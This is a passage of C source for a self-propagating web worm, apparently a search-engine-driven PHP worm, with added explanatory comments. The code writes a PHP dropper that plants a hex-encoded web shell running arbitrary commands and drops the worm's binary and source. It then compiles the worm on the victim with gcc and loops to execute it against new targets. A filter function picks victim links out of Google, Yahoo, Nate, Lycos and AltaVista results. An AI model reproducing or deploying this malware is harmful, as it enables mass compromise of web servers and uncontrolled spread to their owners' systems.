  "\"\\x64\\x3e\\x3c\\x2f\\x46\\x4f\\x52\\x4d\\x3e\\x3c\\x50\\x52\".\n"
  "\"\\x45\\x3e\\x27\\x3b\\x0a\\x09\\x24\\x63\\x6f\\x6d\\x6d\\x61\".\n"
  "\"\\x6e\\x64\\x3d\\x73\\x74\\x72\\x5f\\x72\\x65\\x70\\x6c\\x61\".\n"
  "\"\\x63\\x65\\x28\\x27\\x5c\\x5c\\x27\\x2c\\x27\\x27\\x2c\\x24\".\n"
  "\"\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x29\\x3b\\x0a\\x09\\x65\".\n"
  "\"\\x63\\x68\\x6f\\x20\\x60\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
  "\"\\x64\\x60\\x3b\\x0a\\x3f\\x3e\\x0a\";\n\n"
  "$fp=fopen('%s','w');\n"
  "fputs($fp,$cont);\n"
  "fclose($fp);\n\n",PRC_FILE,BACKDOOR_PATH);

 /* Embed the worm binary. fread() stores one byte into the first byte of an
  * unsigned long (only the low byte on little-endian hosts), and that
  * unsigned long is then passed to "%02x", which expects unsigned int. */
 if((pf=fopen(CODE_PATH,"r"))==NULL)
 {
  return(-1);
 }

 fprintf(fp,"$cont=\"");
 while(fread(&w1,1,1,pf))
 {
  fprintf(fp,"\\x%02x",w1);
 }
 fclose(pf);
 fprintf(fp,"\";\n\n");

 fprintf(fp,"$fp=fopen('%s','w');\n"
  "fputs($fp,$cont);\n"
  "fclose($fp);\n\n",CODE_PATH);
 /* Embed the worm source the same way. */
 if((pf=fopen(CODE_PATH_SRC,"r"))==NULL)
 {
  return(-1);
 }
 fprintf(fp,"$cont=\"");
 while(fread(&w1,1,1,pf))
 {
  fprintf(fp,"\\x%02x",w1);
 }
 fclose(pf);
 fprintf(fp,"\";\n\n");

 fprintf(fp,"$fp=fopen('%s','w');\n"
  "fputs($fp,$cont);\n"
  "fclose($fp);\n\n",CODE_PATH_SRC);
 /* Rebuild on the victim (needs gcc there); the copied binary is the fallback. */
 fprintf(fp,"$RES=`gcc -o %s %s`;\n\n",CODE_PATH,CODE_PATH_SRC);

 fprintf(fp,"chmod('%s',0755);\n",CODE_PATH);

 /* Success markers matched by the scanner under DEBUG_ING. */
 fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",BACKDOOR_PATH);
 fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR1);
 fprintf(fp,"} fclose($fp);\n\n");
 fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",CODE_PATH);
 fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR2);
 fprintf(fp,"} fclose($fp);\n\n");

#if 1
 /* Propagation loop: random rule (0..6), engine (0..3) and start offset. */
 fprintf(fp,"$fnum=(rand()%%%d);\n",TARGET_NUM);
 fprintf(fp,"$snum=(rand()%%%d);\n",SEARCH_NUM);
 /* NOTE: '%' is not doubled here, unlike the two lines above, so fprintf
  * treats "%400)" as a conversion; what this emits is not the intended
  * "rand()%400" and is undefined. */
 fprintf(fp,"$randnum=(rand()%400);\n");

 fprintf(fp,"while(1)\n{\n");
 /* Same running-instance guard as at the top. */
 fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL)\n"
  "{\n"
  "$pnum=fread($fp,32);\n"
  "fclose($fp);\n"
  "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
  "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
  "{\n"
  "exit;\n"
  "}\n"
  "}\n\n",PRC_FILE);

 /* exec() blocks until that zbcode run ends in sf_exit(); then loop again. */
 fprintf(fp,"$port=(rand()%%65500);\n");
 fprintf(fp,"if($port>1024){\n");
 fprintf(fp,"exec(\"./%s -t $fnum -p $port -s $snum -q $randnum\");\n",CODE_PATH);
 fprintf(fp,"}\n}\n");
#else
 /* Disabled uninstall variant. */
 fprintf(fp,"unlink('%s');\n",BACKDOOR_PATH);
 fprintf(fp,"unlink('%s');\n",CODE_PATH);
 fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
 fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
 fprintf(fp,"} else { fclose($fp);\n");
 fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",BACKDOOR_PATH,BACKDOOR_PATH);
 fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
 fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
 fprintf(fp,"}\n}\n");
 fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
 fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
 fprintf(fp,"} else { fclose($fp);\n");
 fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",CODE_PATH,CODE_PATH);
 fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
 fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
 fprintf(fp,"}\n}\n");
#endif
 fprintf(fp,"?>\n");
 fclose(fp);
}
  754.  
/*
 * Noise filter for a candidate link extracted from a search-result page
 * (test_bf, already cut just before the query string). Returns 1 when the text
 * contains none of the engine-specific markers of a non-target: the engine's
 * own domain or cache/redirect links, leftover "<"/">" from tag stripping, a
 * URL-encoded "?" ("%3F"/"%3f"), "..." truncation of a long URL, and VENDOR.
 * Returns 0 otherwise, and for an engine index with no case here. The engine
 * is chosen by search_va[tnum].num. strstr() is case-sensitive, so only the
 * spellings written here are filtered.
 */
int filter_f(char *test_bf,int tnum)
{
 switch(search_va[tnum].num)
 {
  case 0: /* google */
   if(!strstr(test_bf,"google")&&!strstr(test_bf,"/search?q=cache:")
    &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
    &&!strstr(test_bf,"%3F")&&!strstr(test_bf,"...")
    &&!strstr(test_bf,VENDOR))
   {
    return 1;
   }
   else return 0;
   break;

  case 1: /* yahoo */
   if(!strstr(test_bf,"yahoo")&&!strstr(test_bf,"/cache.php?")
    &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
    &&!strstr(test_bf,"search")&&!strstr(test_bf,".html%")
    &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
   {
    return 1;
   }
   else return 0;
   break;

  case 2: /* nate */
   if(!strstr(test_bf,"nate")&&!strstr(test_bf,"RESULT")
    &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
    &&!strstr(test_bf,"/search/")&&!strstr(test_bf,"%3F")
    &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
   {
    return 1;
   }
   else return 0;
   break;

  case 3: /* lycos */
   if(!strstr(test_bf,"lycos")&&!strstr(test_bf,"<")
    &&!strstr(test_bf,">")&&!strstr(test_bf,"%3F")
    &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
   {
    return 1;
   }
   else return 0;
   break;

  case 4: /* altavista: "ref_" marks the engine's own redirect links */
   if(!strstr(test_bf,"ref_")&&!strstr(test_bf,"<")
    &&!strstr(test_bf,">")&&!strstr(test_bf,"%3f")
    &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
   {
    return 1;
   }
   else return 0;
   break;

  default:
   return 0;
   break;
 }
 return 0;
}
  818.  